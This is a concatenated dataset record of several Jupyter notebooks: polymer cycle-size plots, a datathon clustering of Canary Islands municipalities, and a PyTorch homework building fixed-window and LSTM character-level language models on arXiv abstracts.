np.max(loops_rev_water_01)\n \nwith open('scan_p_1000/with_water_rev/old/loops_0.01_0.01.pck', 'rb') as ib:\n loops_rev_water_001 = pickle.load(ib)\n loops_rev_water_001 = [l for x in loops_rev_water_001 for l in x]\n# print np.average(loops_rev_water_001), np.std(loops_rev_water_001), np.min(loops_rev_water_001), np.max(loops_rev_water_001)\n \nwith open('scan_p_1000/with_water_rev/old/loops_0.001_0.01.pck', 'rb') as ib:\n loops_rev_water_0001 = pickle.load(ib)\n# print loops_rev_water_0001\n loops_rev_water_0001 = [l for x in loops_rev_water_0001 for l in x]\n# print np.average(loops_rev_water_0001), np.std(loops_rev_water_0001), np.min(loops_rev_water_0001), np.max(loops_rev_water_0001)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\nplt.rc('text', usetex=True)\nn, x = np.histogram(loops_no_water, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, '^', label=r'no $H_2O$, $k_f=0.001$', markersize=8)\nprint(np.nansum(n))\n\nn, x = np.histogram(loops_water, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, 'd', label=r'$H_2O$ (no hydrolysis), $k_f=0.001$', markersize=8)\nprint(np.nansum(n))\n\nn, x = np.histogram(loops_rev_water_001, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, 'h', label=r'$H_2O$ (hydrolysis), $k_f/k_r=0.01/0.01$', markersize=8)\nprint(np.nansum(n))\n\nn, x = np.histogram(loops_rev_water_01, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, 's', label=r'$H_2O$ (hydrolysis), $k_f/k_r=0.1/0.01$', markersize=8)\nprint(np.nansum(n))\n\nxticks = np.array(list(range(0, 40, 5)))\nplt.xticks(xticks-0.5, xticks)\nplt.xlim([3, 40])\n\nplt.legend(loc=0)\nplt.xlabel('cycle size x (\\# of monomers)')\nplt.ylabel('number of cycles of size x')\n#plt.annotate(r'$k_r=0.01$', xy=(0.57, 0.64), xycoords='axes fraction', fontsize=16)\nplt.tight_layout()\nplt.savefig('result_graphics/loop_size.pdf', tight_layout=True)",
"145.0\n99.0\n3.0\n8.0\n"
],
[
"with open('scan_p_1000/no_water/loops.pck', 'rb') as ib:\n loops_no_water = pickle.load(ib)\n print(loops_no_water)\n #loops_no_water = [l for x in loops_no_water for l in x] ",
"[[10, 4, 6, 8, 4], [8, 4, 8, 10, 4, 8, 4, 4], [8, 20, 6, 6, 6, 6, 4, 6, 4, 4, 8], [4, 6, 6, 4], [8, 4, 6, 8, 4, 4, 4, 4, 6, 4, 4, 8, 4], [4, 6, 4, 4, 6, 6, 10, 4, 6, 4], [4, 4, 4, 12, 16, 4, 4, 4, 4, 4], [10, 8, 10, 4, 10, 4], [4, 34, 4, 12, 8, 6, 4, 10, 8, 4, 4], [28, 8, 6, 8, 4], [6, 8, 10, 8, 8, 6], [10, 8, 4, 4, 6, 6, 4], [16, 6, 6, 8, 6, 4, 6, 4, 4], [4, 6, 6, 4], [8, 8, 4, 4, 12, 4], [4, 6, 10, 4, 4, 4], [6, 4, 4, 4], [4, 8, 8, 4], [12, 4, 8, 6, 4, 4], [6, 20, 6, 6, 6, 4, 4, 6, 4, 4]]\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb034bca03d7bee9a12fe979f017589069a7c934 | 100,125 | ipynb | Jupyter Notebook | datathon2021/notebooks/02_Group_profiles.ipynb | Afroefras/datathon2021 | 95a96a397ae66098dce535ec86c4a9f4c4f07019 | [
"Apache-2.0"
] | null | null | null | datathon2021/notebooks/02_Group_profiles.ipynb | Afroefras/datathon2021 | 95a96a397ae66098dce535ec86c4a9f4c4f07019 | [
"Apache-2.0"
] | null | null | null | datathon2021/notebooks/02_Group_profiles.ipynb | Afroefras/datathon2021 | 95a96a397ae66098dce535ec86c4a9f4c4f07019 | [
"Apache-2.0"
] | 1 | 2021-09-19T21:15:48.000Z | 2021-09-19T21:15:48.000Z | 40.717771 | 18,591 | 0.4878 | [
[
[
"# Group profiles",
"_____no_output_____"
],
[
"## Parameters",
"_____no_output_____"
]
],
[
[
"BASE_DIR = '/Users/efraflores/Desktop/EF/Contests/Datathon_202109/data/datos'\nFOLDER_NAME = 'profiled'\nCATALOG_NAME = 'Canarias_municipios.csv'",
"_____no_output_____"
]
],
[
[
"## Import",
"_____no_output_____"
]
],
[
[
"from mariachis.models import GroupProfiles\n\ngp = GroupProfiles(BASE_DIR,FOLDER_NAME)\nprint(gp)",
"Path:\t/Users/efraflores/Desktop/EF/Contests/Datathon_202109/data/datos/profiled\nWith 7 profiled files\n"
]
],
[
[
"## Transform",
"_____no_output_____"
]
],
[
[
"df, pipe_obj = gp.full_pipeline(kbest=22, cluster_kwargs={'n_clusters':6, 'kmeans':False}, index='comunity_code', values='cluster', aggfunc=', '.join)\ndf.sample()",
"_____no_output_____"
],
[
"from mariachis.utils import tree_to_code\n\ntree_to_code(df, df.columns)",
"1.0\n if max_cards <= 22.5:\n if Valor_sum_Restaurantes <= 9433.5:\n return [[128. 0. 0. 0. 0. 0.]]\n else: # if Valor_sum_Restaurantes > 9433.5\n return [[0. 0. 0. 0. 2. 0.]]\n else: # if max_cards > 22.5\n if count_cards <= 10488.5:\n return [[0. 0. 0. 4. 0. 0.]]\n else: # if count_cards > 10488.5\n if median_cards <= 17.0:\n return [[0. 0. 2. 0. 0. 0.]]\n else: # if median_cards > 17.0\n if max_avg_amount <= 425.5900001525879:\n return [[0. 0. 0. 0. 0. 1.]]\n else: # if max_avg_amount > 425.5900001525879\n return [[0. 1. 0. 0. 0. 0.]]\n"
]
],
[
[
"## Profiles",
"_____no_output_____"
]
],
[
[
"from mariachis.utils import profiles\n\nprof = profiles(df)\n\nfor i,var in enumerate(prof.values()):\n aux = var.fillna(0)\n display(aux.style.format(\"{:.0f}\").background_gradient('Blues'))\n # aux.T.to_csv(f'Profiles_{i}.csv')",
"_____no_output_____"
],
[
"cluster_dict = {\n 'A':'Diversión para toda la familia',\n 'B':'La mejor fiesta tropical de tu vida',\n 'C':'Ruta del vino, trae tu abrigo',\n 'D':'Platillos exclusivos para tus viajes de trabajo',\n 'E':'Atrévete a la aventura',\n 'F':'Déjate consentir en la zona dorada y el mejor clima',\n}\n\ndf['final_cluster'] = df['cluster'].map(cluster_dict)\ndf['final_cluster'].value_counts(1)",
"_____no_output_____"
],
[
"import cufflinks as cf\nfrom pandas import DataFrame\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import MinMaxScaler\n\npipe_pca = Pipeline(steps=[('pre_scaler', MinMaxScaler()), ('dim_red', PCA(3))])\nX = DataFrame(pipe_pca.fit_transform(df.iloc[:,:-3]), index=df.index).join(df['final_cluster'])\n\ncf.go_offline()\nchart_size = cf.Layout(height=700, width=1100)\nX.iplot(kind='scatter3d', mode='markers', x=0, y=1, z=2, categories='final_cluster', layout=chart_size)",
"_____no_output_____"
]
],
[
[
"## Merge catalog",
"_____no_output_____"
]
],
[
[
"from pathlib import Path\nfrom pandas import read_csv\n\ncat = read_csv(Path(BASE_DIR).joinpath(CATALOG_NAME))\nfinal = df[['final_cluster']].reset_index().merge(cat)\nfinal.sample(2)",
"_____no_output_____"
]
],
[
[
"## Export",
"_____no_output_____"
]
],
[
[
"gp.export_result(final, 'grouped_3D.csv')",
"Exported succesfully!\nFile:\tgrouped_3D.csv\nPath:\t/Users/efraflores/Desktop/EF/Contests/Datathon_202109/data/datos\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb03584a018d3db1e8a441e6c01e10338b2f3203 | 148,094 | ipynb | Jupyter Notebook | week03_lm/homework_pytorch.ipynb | jkneng/nlp_course | 55c10cc2b56e725e585016142f811e55407b3da5 | [
"MIT"
] | null | null | null | week03_lm/homework_pytorch.ipynb | jkneng/nlp_course | 55c10cc2b56e725e585016142f811e55407b3da5 | [
"MIT"
] | null | null | null | week03_lm/homework_pytorch.ipynb | jkneng/nlp_course | 55c10cc2b56e725e585016142f811e55407b3da5 | [
"MIT"
] | null | null | null | 114.979814 | 47,848 | 0.70462 | [
[
[
"### Homework: going neural (6 pts)\n\nWe've checked out statistical approaches to language models in the last notebook. Now let's go find out what deep learning has to offer.\n\n<img src='https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/expanding_mind_lm_kn_3.png' width=300px>\n\nWe're gonna use the same dataset as before, except this time we build a language model that's character-level, not word level. Before you go:\n* If you haven't done seminar already, use `seminar.ipynb` to download the data.\n* This homework uses Pytorch v1.x: this is [how you install it](https://pytorch.org/get-started/locally/); and that's [how you use it](https://github.com/yandexdataschool/Practical_RL/tree/9f89e98d7df7ad47f5d6c85a70a38283e06be16a/week04_%5Brecap%5D_deep_learning).",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"Working on character level means that we don't need to deal with large vocabulary or missing words. Heck, we can even keep uppercase words in text! The downside, however, is that all our sequences just got a lot longer.\n\nHowever, we still need special tokens:\n* Begin Of Sequence (__BOS__) - this token is at the start of each sequence. We use it so that we always have non-empty input to our neural network. $P(x_t) = P(x_1 | BOS)$\n* End Of Sequence (__EOS__) - you guess it... this token is at the end of each sequence. The catch is that it should __not__ occur anywhere else except at the very end. If our model produces this token, the sequence is over.\n",
"_____no_output_____"
]
],
[
[
"BOS, EOS = ' ', '\\n'\n\ndata = pd.read_json(\"./arxivData.json\")\nlines = data.apply(lambda row: (row['title'] + ' ; ' + row['summary'])[:512], axis=1) \\\n .apply(lambda line: BOS + line.replace(EOS, ' ') + EOS) \\\n .tolist()\n\n# if you missed the seminar, download data here - https://yadi.sk/d/_nGyU2IajjR9-w",
"_____no_output_____"
],
[
"lines[:3]",
"_____no_output_____"
]
],
[
[
"Our next step is __building char-level vocabulary__. Put simply, you need to assemble a list of all unique tokens in the dataset.",
"_____no_output_____"
]
],
[
[
"# get all unique characters from lines (including capital letters and symbols)\ntoken_set = set()\nlist(map(lambda x: token_set.update(x), [list(line) for line in lines])) # add list to eager execution\ntokens = list(token_set)\n",
"_____no_output_____"
],
[
"tokens = sorted(tokens)\nn_tokens = len(tokens)\nprint ('n_tokens = ',n_tokens)\nassert 100 < n_tokens < 150\nassert BOS in tokens, EOS in tokens",
"n_tokens = 136\n"
]
],
[
[
"We can now assign each character with it's index in tokens list. This way we can encode a string into a torch-friendly integer vector.",
"_____no_output_____"
]
],
[
[
"# dictionary of character -> its identifier (index in tokens list)\ntoken_to_id = {token:i for i, token in enumerate(tokens)}",
"_____no_output_____"
],
[
"assert len(tokens) == len(token_to_id), \"dictionaries must have same size\"\nfor i in range(n_tokens):\n assert token_to_id[tokens[i]] == i, \"token identifier must be it's position in tokens list\"\n\nprint(\"Seems alright!\")",
"Seems alright!\n"
]
],
[
[
"Our final step is to assemble several strings in a integet matrix `[batch_size, text_length]`. \n\nThe only problem is that each sequence has a different length. We can work around that by padding short sequences with extra _EOS_ or cropping long sequences. Here's how it works:",
"_____no_output_____"
]
],
[
[
"def to_matrix(lines, max_len=None, pad=token_to_id[EOS], dtype=np.int64):\n \"\"\"Casts a list of lines into torch-digestable matrix\"\"\"\n max_len = max_len or max(map(len, lines))\n lines_ix = np.full([len(lines), max_len], pad, dtype=dtype)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.get, lines[i][:max_len]))\n lines_ix[i, :len(line_ix)] = line_ix\n return lines_ix",
"_____no_output_____"
],
[
"#Example: cast 4 random names to matrices, pad with zeros\ndummy_lines = [\n ' abc\\n',\n ' abacaba\\n',\n ' abc1234567890\\n',\n]\nprint(to_matrix(dummy_lines))\n\n",
"[[ 1 66 67 68 0 0 0 0 0 0 0 0 0 0 0]\n [ 1 66 67 66 68 66 67 66 0 0 0 0 0 0 0]\n [ 1 66 67 68 18 19 20 21 22 23 24 25 26 17 0]]\n"
]
],
[
[
"### Neural Language Model (2 points including training)\n\nJust like for N-gram LMs, we want to estimate probability of text as a joint probability of tokens (symbols this time).\n\n$$P(X) = \\prod_t P(x_t \\mid x_0, \\dots, x_{t-1}).$$ \n\nInstead of counting all possible statistics, we want to train a neural network with parameters $\\theta$ that estimates the conditional probabilities:\n\n$$ P(x_t \\mid x_0, \\dots, x_{t-1}) \\approx p(x_t \\mid x_0, \\dots, x_{t-1}, \\theta) $$\n\n\nBut before we optimize, we need to define our neural network. Let's start with a fixed-window (aka convolutional) architecture:\n\n<img src='https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/fixed_window_lm.jpg' width=400px>\n",
"_____no_output_____"
]
],
[
[
"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F",
"_____no_output_____"
],
[
"class FixedWindowLanguageModel(nn.Module):\n def __init__(self, n_tokens=n_tokens, emb_size=16, hid_size=64):\n \"\"\" \n A fixed window model that looks on at least 5 previous symbols.\n \n Note: fixed window LM is effectively performing a convolution over a sequence of words.\n This convolution only looks on current and previous words.\n Such convolution can be represented as a sequence of 2 operations:\n - pad input vectors by {strides * (filter_size - 1)} zero vectors on the \"left\", do not pad right\n - perform regular convolution with {filter_size} and {strides}\n \n - If you're absolutely lost, here's a hint: use nn.ZeroPad2d((NUM_LEADING_ZEROS, 0, 0, 0))\n followed by a nn.Conv1d(..., padding=0). And yes, its okay that padding is technically \"2d\".\n \"\"\"\n super().__init__() # initialize base class to track sub-layers, trainable variables, etc.\n \n # YOUR CODE - create layers/variables and any metadata you want, e.g. self.emb = L.Embedding(...)\n \n self.emb = nn.Embedding(n_tokens, emb_size)\n self.padding = nn.ZeroPad2d((0, 0, 4, 0))\n self.kernel_size = 5\n self.conv = nn.Conv1d(emb_size, hid_size, self.kernel_size)\n self.fc = nn.Linear(hid_size, n_tokens)\n \n #END OF YOUR CODE\n \n def __call__(self, input_ix):\n \"\"\"\n compute language model logits given input tokens\n :param input_ix: batch of sequences with token indices, tensor: int32[batch_size, sequence_length]\n :returns: pre-softmax linear outputs of language model [batch_size, sequence_length, n_tokens]\n these outputs will be used as logits to compute P(x_t | x_0, ..., x_{t - 1})\n \n :note: that convolutions operate with tensors of shape [batch, channels, length], while linear layers\n and *embeddings* use [batch, length, channels] tensors. Use tensor.permute(...) to adjust shapes.\n\n \"\"\"\n # YOUR CODE - apply layers, see docstring above\n x = self.emb(input_ix)\n x = self.padding(x)\n x = x.permute(0, 2, 1)\n\n x_conv = self.conv(x)\n # x_conv = F.relu(x_conv)\n x_conv = x_conv.permute(0, 2, 1)\n \n x = self.fc(x_conv)\n \n return x # output tensor should be of shape [batch_size, sequence_length, n_tokens]\n \n def get_possible_next_tokens(self, prefix=BOS, temperature=1.0, max_len=100):\n \"\"\" :returns: probabilities of next token, dict {token : prob} for all tokens \"\"\"\n prefix_ix = torch.as_tensor(to_matrix([prefix]), dtype=torch.int64)\n with torch.no_grad():\n probs = torch.softmax(self(prefix_ix)[0, -1], dim=-1).cpu().numpy() # shape: [n_tokens]\n return dict(zip(tokens, probs))\n ",
"_____no_output_____"
],
[
"dummy_model = FixedWindowLanguageModel()\n\ndummy_input_ix = torch.as_tensor(to_matrix(dummy_lines))\ndummy_logits = dummy_model(dummy_input_ix)\n\nprint('Weights:', tuple(name for name, w in dummy_model.named_parameters()))",
"Weights: ('emb.weight', 'conv.weight', 'conv.bias', 'fc.weight', 'fc.bias')\n"
],
[
"assert isinstance(dummy_logits, torch.Tensor)\nassert dummy_logits.shape == (len(dummy_lines), max(map(len, dummy_lines)), n_tokens), \"please check output shape\"\nassert np.all(np.isfinite(dummy_logits.data.cpu().numpy())), \"inf/nan encountered\"\nassert not np.allclose(dummy_logits.data.cpu().numpy().sum(-1), 1), \"please predict linear outputs, don't use softmax (maybe you've just got unlucky)\"",
"_____no_output_____"
],
[
"# test for lookahead\ndummy_input_ix_2 = torch.as_tensor(to_matrix([line[:3] + 'e' * (len(line) - 3) for line in dummy_lines]))\ndummy_logits_2 = dummy_model(dummy_input_ix_2)\n\nassert torch.allclose(dummy_logits[:, :3], dummy_logits_2[:, :3]), \"your model's predictions depend on FUTURE tokens. \" \\\n \" Make sure you don't allow any layers to look ahead of current token.\" \\\n \" You can also get this error if your model is not deterministic (e.g. dropout). Disable it for this test.\"",
"_____no_output_____"
]
],
[
[
"We can now tune our network's parameters to minimize categorical crossentropy over training dataset $D$:\n\n$$ L = {\\frac1{|D|}} \\sum_{X \\in D} \\sum_{x_i \\in X} - \\log p(x_t \\mid x_1, \\dots, x_{t-1}, \\theta) $$\n\nAs usual with with neural nets, this optimization is performed via stochastic gradient descent with backprop. One can also note that minimizing crossentropy is equivalent to minimizing model __perplexity__, KL-divergence or maximizng log-likelihood.",
"_____no_output_____"
]
],
[
[
"def compute_mask(input_ix, eos_ix=token_to_id[EOS]):\n \"\"\" compute a boolean mask that equals \"1\" until first EOS (including that EOS) \"\"\"\n cumsum = torch.cumsum(input_ix == eos_ix, dim=-1)\n # print('cumsum', cumsum)\n # print(cumsum[..., :-1] < 1)\n return F.pad(torch.cumsum(input_ix == eos_ix, dim=-1)[..., :-1] < 1, pad=(1, 0, 0, 0), value=True)\n # return cumsum[..., :-1] < 1\n\nprint('matrix:\\n', dummy_input_ix.numpy())\nprint('mask:\\n', compute_mask(dummy_input_ix).to(torch.int32).cpu().numpy())\nprint('lengths:', compute_mask(dummy_input_ix).sum(-1).cpu().numpy())",
"matrix:\n [[ 1 66 67 68 0 0 0 0 0 0 0 0 0 0 0]\n [ 1 66 67 66 68 66 67 66 0 0 0 0 0 0 0]\n [ 1 66 67 68 18 19 20 21 22 23 24 25 26 17 0]]\nmask:\n [[1 1 1 1 1 0 0 0 0 0 0 0 0 0 0]\n [1 1 1 1 1 1 1 1 1 0 0 0 0 0 0]\n [1 1 1 1 1 1 1 1 1 1 1 1 1 1 1]]\nlengths: [ 5 9 15]\n"
],
[
"def compute_loss(model, input_ix):\n \"\"\"\n :param model: language model that can compute next token logits given token indices\n :param input ix: int32 matrix of tokens, shape: [batch_size, length]; padded with eos_ix\n :returns: scalar loss function, mean crossentropy over non-eos tokens\n \"\"\"\n input_ix = torch.as_tensor(input_ix, dtype=torch.int64)\n \n\n logits = model(input_ix[:, :-1])\n # logits = F.log_softmax(logits, dim=2)\n # print(f'logits.shape: {logits.shape}')\n reference_answers = input_ix[:, 1:]\n\n # Your task: implement loss function as per formula above\n # your loss should only be computed on actual tokens, excluding padding\n # predicting actual tokens and first EOS do count. Subsequent EOS-es don't\n # you may or may not want to use the compute_mask function from above.\n \n # input_mask = compute_mask(input_ix[:, :-1])\n input_mask = compute_mask(reference_answers)\n input_mask = torch.unsqueeze(input_mask, 2)\n # print('input_mask.shape:', input_mask.shape)\n # print('logits[0]:', logits[0])\n masked_logits = torch.mul(logits, input_mask) # 对应位相乘\n masked_logits = F.log_softmax(masked_logits, dim=2)\n # print(f'masked_logits.shape: {masked_logits.shape}')\n # celoss = nn.CrossEntropyLoss()\n # loss = celoss(masked_logits, reference_answers)\n # print(f'masked_logits.shape: {masked_logits.shape}')\n # print('reference_answers.shape, ', reference_answers.shape)\n ml = masked_logits.reshape(-1, masked_logits.size(2))\n ref = reference_answers.reshape(-1)\n # print(ref)\n loss = F.cross_entropy(ml, ref) / len(input_ix)\n # print(loss.shape)\n\n return loss\n ",
"_____no_output_____"
],
[
"input = to_matrix(dummy_lines, max_len=15)\nprint('input shape', input.shape)\nloss_1 = compute_loss(dummy_model, input)\nloss_2 = compute_loss(dummy_model, to_matrix(dummy_lines, max_len=16))\nprint(loss_1, loss_2)",
"input shape (3, 15)\ntensor(1.6738, grad_fn=<DivBackward0>) tensor(1.6714, grad_fn=<DivBackward0>)\n"
],
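[
"# Illustrative sketch, not part of the assignment: the text above notes that minimizing crossentropy\n# is equivalent to minimizing perplexity. Assuming the loss is the mean per-token crossentropy in nats,\n# the corresponding character-level perplexity is simply its exponential.\nwith torch.no_grad():\n    example_loss = compute_loss(dummy_model, to_matrix(dummy_lines))\n    print('crossentropy:', example_loss.item(), '-> perplexity:', torch.exp(example_loss).item())",
"_____no_output_____"
],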
[
"loss_1 = compute_loss(dummy_model, to_matrix(dummy_lines, max_len=15))\nloss_2 = compute_loss(dummy_model, to_matrix(dummy_lines, max_len=16))\nassert (np.ndim(loss_1) == 0) and (0 < loss_1 < 100), \"loss must be a positive scalar\"\nassert torch.allclose(loss_1, loss_2), 'do not include AFTER first EOS into loss. '\\\n 'Hint: use compute_mask. Beware +/-1 errors. And be careful when averaging!'",
"_____no_output_____"
]
],
[
[
"### Evaluation\n\nYou will need two functions: one to compute test loss and another to generate samples. For your convenience, we implemented them both in your stead.",
"_____no_output_____"
]
],
[
[
"def score_lines(model, dev_lines, batch_size):\n \"\"\" computes average loss over the entire dataset \"\"\"\n dev_loss_num, dev_loss_len = 0., 0.\n with torch.no_grad():\n for i in range(0, len(dev_lines), batch_size):\n batch_ix = to_matrix(dev_lines[i: i + batch_size])\n dev_loss_num += compute_loss(model, batch_ix).item() * len(batch_ix)\n dev_loss_len += len(batch_ix)\n return dev_loss_num / dev_loss_len\n\ndef generate(model, prefix=BOS, temperature=1.0, max_len=100):\n \"\"\"\n Samples output sequence from probability distribution obtained by model\n :param temperature: samples proportionally to model probabilities ^ temperature\n if temperature == 0, always takes most likely token. Break ties arbitrarily.\n \"\"\"\n with torch.no_grad():\n while True:\n token_probs = model.get_possible_next_tokens(prefix)\n tokens, probs = zip(*token_probs.items())\n if temperature == 0:\n next_token = tokens[np.argmax(probs)]\n else:\n probs = np.array([p ** (1. / temperature) for p in probs])\n probs /= sum(probs)\n next_token = np.random.choice(tokens, p=probs)\n\n prefix += next_token\n if next_token == EOS or len(prefix) > max_len: break\n return prefix",
"_____no_output_____"
]
],
[
[
"### Training loop\n\nFinally, let's train our model on minibatches of data",
"_____no_output_____"
]
],
[
[
"from sklearn.model_selection import train_test_split\ntrain_lines, dev_lines = train_test_split(lines, test_size=0.25, random_state=42)\n\nbatch_size = 256\nscore_dev_every = 250\ntrain_history, dev_history = [], []\nmodel = FixedWindowLanguageModel()\nopt = torch.optim.Adam(model.parameters())\n\n# hint: if you ever wanted to switch to cuda, do it now.\n\n# score untrained model\ndev_history.append((0, score_lines(model, dev_lines, batch_size)))\nprint(\"Sample before training:\", generate(model, 'Bridging'))",
"Sample before training: BridgingGpàś@ε84ü'b'oσ!õ?ôWÉáωhŁρν{ÉAã~W/è8FQ&=w(ν%\\WjáôO0éAβö lo%qMgJα<8RE|O#4Vucõsgü=MüeLα6/q-qklCE\n"
],
[
"from IPython.display import clear_output\nfrom random import sample\nfrom tqdm import trange\n\nfor i in trange(len(train_history), 5000):\n batch = to_matrix(sample(train_lines, batch_size))\n \n \n loss_i = compute_loss(model, batch)\n \n opt.zero_grad()\n loss_i.backward()\n opt.step()\n \n train_history.append((i, loss_i.item()))\n \n if (i + 1) % 50 == 0:\n clear_output(True)\n plt.scatter(*zip(*train_history), alpha=0.1, label='train_loss')\n if len(dev_history):\n plt.plot(*zip(*dev_history), color='red', label='dev_loss')\n plt.legend(); plt.grid(); plt.show()\n print(\"Generated examples (tau=0.5):\")\n for _ in range(3):\n print(generate(model, temperature=0.5))\n \n if (i + 1) % score_dev_every == 0:\n print(\"Scoring dev...\")\n dev_history.append((i, score_lines(model, dev_lines, batch_size)))\n print('#%i Dev loss: %.3f' % dev_history[-1])\n",
"_____no_output_____"
],
[
"assert np.mean(train_history[:10], axis=0)[1] > np.mean(train_history[-10:], axis=0)[1], \"The model didn't converge.\"\nprint(\"Final dev loss:\", dev_history[-1][-1])\n\nfor i in range(10):\n print(generate(model, temperature=0.5))",
"Final dev loss: 0.008852234311220123\n Foress the trobles and cons as andse finasion thation late for as the ang arner andec ination thing \n Ne whe s and se work serecentigo s ale tion are the des an ing and with al he whe the the s an thar \n Ad pores mantion the prodeat des of amplesentitit formation lation of the s aletrom ation as inged \n Scoproblem io preatival oral and tha deation thed the requede the sentren s anderating is wors and t\n Nesion dal and ale and bee verel cende mode abetion the re pores machint on the probes the the the \n Aderens the s apporeas aralization the sens de thmention aring an objective the se s for andition th\n A peration d aund araly thow ing arel cod extive rechis pacel mation late the he se the cons in tho \n Araplearne and the the pesertint at of ars aralize toves ; This and the ins ate the serevere tores t\n Faris and works mation that on the pares. The tho se whed er be der and and sed pe poralis and the p\n Os ane Experache ron seathec int on or alsico the beat onstion anderal orons mo the ural tion teding\n"
]
],
[
[
"### RNN Language Models (3 points including training)\n\nFixed-size architectures are reasonably good when capturing short-term dependencies, but their design prevents them from capturing any signal outside their window. We can mitigate this problem by using a __recurrent neural network__:\n\n$$ h_0 = \\vec 0 ; \\quad h_{t+1} = RNN(x_t, h_t) $$\n\n$$ p(x_t \\mid x_0, \\dots, x_{t-1}, \\theta) = dense_{softmax}(h_{t-1}) $$\n\nSuch model processes one token at a time, left to right, and maintains a hidden state vector between them. Theoretically, it can learn arbitrarily long temporal dependencies given large enough hidden size.\n\n<img src='https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/rnn_lm.jpg' width=480px>",
"_____no_output_____"
]
],
[
[
"class RNNLanguageModel(nn.Module):\n def __init__(self, n_tokens=n_tokens, emb_size=16, hid_size=256):\n \"\"\" \n Build a recurrent language model.\n You are free to choose anything you want, but the recommended architecture is\n - token embeddings\n - one or more LSTM/GRU layers with hid size\n - linear layer to predict logits\n \n :note: if you use nn.RNN/GRU/LSTM, make sure you specify batch_first=True\n With batch_first, your model operates with tensors of shape [batch_size, sequence_length, num_units]\n Also, please read the docs carefully: they don't just return what you want them to return :)\n \"\"\"\n super().__init__() # initialize base class to track sub-layers, trainable variables, etc.\n \n # YOUR CODE - create layers/variables/etc\n \n self.emb = nn.Embedding(n_tokens, emb_size)\n self.lstm = nn.LSTM(input_size=emb_size, hidden_size=hid_size, num_layers=1, batch_first=True)\n self.fc = nn.Linear(hid_size, n_tokens)\n #END OF YOUR CODE\n \n def __call__(self, input_ix):\n \"\"\"\n compute language model logits given input tokens\n :param input_ix: batch of sequences with token indices, tensor: int32[batch_size, sequence_length]\n :returns: pre-softmax linear outputs of language model [batch_size, sequence_length, n_tokens]\n these outputs will be used as logits to compute P(x_t | x_0, ..., x_{t - 1})\n \"\"\"\n # YOUR CODE - apply layers, see docstring above\n x = self.emb(input_ix)\n x_lstm, (h_n, c_n) = self.lstm(x)\n x_fc = self.fc(x_lstm)\n return x_fc # output tensor should be of shape [batch_size, sequence_length, n_tokens]\n \n def get_possible_next_tokens(self, prefix=BOS, temperature=1.0, max_len=100):\n \"\"\" :returns: probabilities of next token, dict {token : prob} for all tokens \"\"\"\n prefix_ix = torch.as_tensor(to_matrix([prefix]), dtype=torch.int64)\n with torch.no_grad():\n probs = torch.softmax(self(prefix_ix)[0, -1], dim=-1).cpu().numpy() # shape: [n_tokens]\n return dict(zip(tokens, probs))\n ",
"_____no_output_____"
],
[
"model = RNNLanguageModel()\n\ndummy_input_ix = torch.as_tensor(to_matrix(dummy_lines))\ndummy_logits = model(dummy_input_ix)\n\nassert isinstance(dummy_logits, torch.Tensor)\nassert dummy_logits.shape == (len(dummy_lines), max(map(len, dummy_lines)), n_tokens), \"please check output shape\"\nassert not np.allclose(dummy_logits.cpu().data.numpy().sum(-1), 1), \"please predict linear outputs, don't use softmax (maybe you've just got unlucky)\"\nprint('Weights:', tuple(name for name, w in model.named_parameters()))",
"Weights: ('emb.weight', 'lstm.weight_ih_l0', 'lstm.weight_hh_l0', 'lstm.bias_ih_l0', 'lstm.bias_hh_l0', 'fc.weight', 'fc.bias')\n"
],
[
"# test for lookahead\ndummy_input_ix_2 = torch.as_tensor(to_matrix([line[:3] + 'e' * (len(line) - 3) for line in dummy_lines]))\ndummy_logits_2 = model(dummy_input_ix_2)\n\nassert torch.allclose(dummy_logits[:, :3], dummy_logits_2[:, :3]), \"your model's predictions depend on FUTURE tokens. \" \\\n \" Make sure you don't allow any layers to look ahead of current token.\" \\\n \" You can also get this error if your model is not deterministic (e.g. dropout). Disable it for this test.\"",
"_____no_output_____"
]
],
[
[
"### RNN training\n\nOur RNN language model should optimize the same loss function as fixed-window model. But there's a catch. Since RNN recurrently multiplies gradients through many time-steps, gradient values may explode, [ruining](https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/nan.jpg) your model.\nThe common solution to that problem is to clip gradients either [individually](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/clip_by_value) or [globally](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/clip_by_global_norm).\n\nYour task here is to implement the training code that minimizes the loss function. If you encounter large loss fluctuations during training, please add [gradient clipping](https://pytorch.org/docs/stable/generated/torch.nn.utils.clip_grad_norm_.html) using urls above. But its **not necessary** to use gradient clipping if you don't need it.\n\n_Note: gradient clipping is not exclusive to RNNs. Convolutional networks with enough depth often suffer from the same issue._",
"_____no_output_____"
]
],
[
[
